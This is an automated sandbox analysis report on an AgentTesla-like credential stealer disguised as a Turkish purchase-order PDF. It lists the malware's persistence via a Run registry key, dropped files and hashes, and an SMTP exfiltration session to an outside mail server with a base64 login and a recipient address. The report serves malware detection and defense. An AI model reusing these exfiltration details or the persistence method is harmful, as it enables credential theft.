                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:03:55API Interceptor1785358x Sleep call for process: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe modified
                      16:03:57API Interceptor8x Sleep call for process: powershell.exe modified
                      16:04:12API Interceptor405029x Sleep call for process: ctsdvwT.exe modified
                      21:04:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                      21:04:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.81.155.88PROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exeGet hashmaliciousAgentTeslaBrowse
                        YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exeGet hashmaliciousAgentTeslaBrowse
                          KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              mail.saralgumruk.comPROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.81.155.88
                              YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.81.155.88
                              KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 185.81.155.88
                              Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 185.81.155.88

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              RADORETRsDcscN5fmS.exeGet hashmaliciousFormBookBrowse
                              • 89.252.183.67
                              PURCHASE ORDER.docGet hashmaliciousFormBookBrowse
                              • 89.252.183.67
                              PROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.81.155.88
                              YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.81.155.88
                              KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 185.81.155.88
                              G7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                              • 89.252.183.67
                              Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 185.81.155.88
                              TS-240514-UF2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 89.252.183.67
                              z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                              • 185.210.92.160
                              Fiyat teklifi Istegi 23070 PER 72 Adet #U2026scanneed 00101 xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 185.123.54.147

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ctsdvwT.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1172
                              Entropy (8bit):5.3550249375369265
                              Encrypted:false
                              SSDEEP:24:3OWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKIl9ia8Hu:eWSU4xympgv4RIoUP7mZ9tK8NDT
                              MD5:DD7816BEEA4989ED1A1D1396992A30B1
                              SHA1:84BA04B6A2816B26B6B118CC9BDB38D6EA2ABA79
                              SHA-256:C2938579FF73C4598BABE96563909FAE320E2189B4D3C307B25661FF5710AEB2
                              SHA-512:542656ED2366F9FD388F4A39AE9852B3EDDB2EA055A7F41B6FC646FB44ADD34576DCE52D46145EFD62998C8B2053432DF1B6C3402C66FC33CAB88C4AFE0184DD
                              Malicious:false
                              Reputation:low
                              Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wma1svk.vhv.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezofw04x.pqh.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkj1iex.1pz.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhp0yrly.g2d.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                              Download File
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):856064
                              Entropy (8bit):7.881527902955562
                              Encrypted:false
                              SSDEEP:24576:Yw4bjw4bJWBbDcr6vNVIbKADy2VqC5yYOWMU/fpTMnp7:Yw4bjw4bARE6FWbKegCEYOWMU5TMR
                              MD5:B90266D6B73DB4F10B1CC8F90A81A4AA
                              SHA1:9422DD5935C7299DA1C6C8B7B5E0E9E89743DDFB
                              SHA-256:B5E9A3A112C889E9AFAA48926ED0BF9474FB430CC99DFF8915192877F58D5EFE
                              SHA-512:AED559705834AEDCE48808F2225D2657C59EC24F2766BAE56750544D9507FB47B05B8EFE7690CFBA769031954E6437895910828FC68A17F9B2602BAA34A78828
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 37%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:N...............0......@........... ........@.. .......................@............@.................................t...O........%................... ......X................................................ ............... ..H............text....... ...................... ..`.rsrc....%.......0..................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.881527902955562
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File size:856'064 bytes
                              MD5:b90266d6b73db4f10b1cc8f90a81a4aa
                              SHA1:9422dd5935c7299da1c6c8b7b5e0e9e89743ddfb
                              SHA256:b5e9a3a112c889e9afaa48926ed0bf9474fb430cc99dff8915192877f58d5efe
                              SHA512:aed559705834aedce48808f2225d2657c59ec24f2766bae56750544d9507fb47b05b8efe7690cfba769031954e6437895910828fc68a17f9b2602baa34a78828
                              SSDEEP:24576:Yw4bjw4bJWBbDcr6vNVIbKADy2VqC5yYOWMU/fpTMnp7:Yw4bjw4bARE6FWbKegCEYOWMU5TMR
                              TLSH:D9051260F3F94B40E57997F6902112944BFAB8ABB576E31C0CC161DF69B1B408B52F2B
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:N...............0......@........... ........@.. .......................@............@................................

                              File Icon

                              Icon Hash:1b62dc9ddb63329b

                              Static PE Info

                              General

                              Entrypoint:0x4cddc6
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0xAA4E3A0D [Sat Jul 17 01:29:49 2060 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcdd740x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x258c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xcdd580x1c.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xcbdcc0xcc000ca6f0bed309a940ccf1cd02c69a8e651False0.9320606904871324data7.925581129662268IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xce0000x258c0x3000372c5a35c0c3c6a311699f358c1097f1False0.692626953125data6.366466962574619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd20000xc0x10006da3e67b656cfcc86f5baaa49bf27d07False0.0087890625data0.015920183265625623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xce1000x1ec0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9712906504065041
                              RT_GROUP_ICON0xcffd00x14data1.05
                              RT_VERSION0xcfff40x398OpenPGP Public Key0.42282608695652174
                              RT_MANIFEST0xd039c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 22, 2024 22:05:34.995316029 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:35.001368999 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:35.001435041 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:35.960376978 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:35.961457014 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:35.966341019 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.235937119 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.236921072 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:36.241884947 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.465868950 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.466986895 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:36.488018036 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.757276058 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.761012077 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:36.766972065 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.986787081 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:36.986973047 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:36.992249966 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:37.234474897 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:37.239279985 CEST58759154185.81.155.88192.168.2.9
                              May 22, 2024 22:05:37.241064072 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:37.245735884 CEST59154587192.168.2.9185.81.155.88
                              May 22, 2024 22:05:37.297692060 CEST58759154185.81.155.88192.168.2.9

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 22, 2024 22:04:42.011518002 CEST5349449162.159.36.2192.168.2.9
                              May 22, 2024 22:04:42.548281908 CEST53530851.1.1.1192.168.2.9
                              May 22, 2024 22:05:34.865268946 CEST6510653192.168.2.91.1.1.1
                              May 22, 2024 22:05:34.988101959 CEST53651061.1.1.1192.168.2.9

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 22, 2024 22:05:34.865268946 CEST192.168.2.91.1.1.10x9426Standard query (0)mail.saralgumruk.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 22, 2024 22:05:34.988101959 CEST1.1.1.1192.168.2.90x9426No error (0)mail.saralgumruk.com185.81.155.88A (IP address)IN (0x0001)false

                              SMTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              May 22, 2024 22:05:35.960376978 CEST58759154185.81.155.88192.168.2.9220 server.hostisi.com ESMTP Exim 4.96 Wed, 22 May 2024 22:53:12 +0300
                              May 22, 2024 22:05:35.961457014 CEST59154587192.168.2.9185.81.155.88EHLO 134349
                              May 22, 2024 22:05:36.235937119 CEST58759154185.81.155.88192.168.2.9250-server.hostisi.com Hello 134349 [8.46.123.175]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-STARTTLS
                              250 HELP
                              May 22, 2024 22:05:36.236921072 CEST59154587192.168.2.9185.81.155.88AUTH login c3lpbG1hekBzYXJhbGd1bXJ1ay5jb20=
                              May 22, 2024 22:05:36.465868950 CEST58759154185.81.155.88192.168.2.9334 UGFzc3dvcmQ6
                              May 22, 2024 22:05:36.757276058 CEST58759154185.81.155.88192.168.2.9235 Authentication succeeded
                              May 22, 2024 22:05:36.761012077 CEST59154587192.168.2.9185.81.155.88MAIL FROM:<syilmaz@saralgumruk.com>
                              May 22, 2024 22:05:36.986787081 CEST58759154185.81.155.88192.168.2.9250 OK
                              May 22, 2024 22:05:36.986973047 CEST59154587192.168.2.9185.81.155.88RCPT TO:<phinametics247@gmail.com>
                              May 22, 2024 22:05:37.234474897 CEST58759154185.81.155.88192.168.2.9550 User account syilmaz@saralgumruk.com has sent too many emails

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:5
                              Start time:16:03:55
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0x470000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
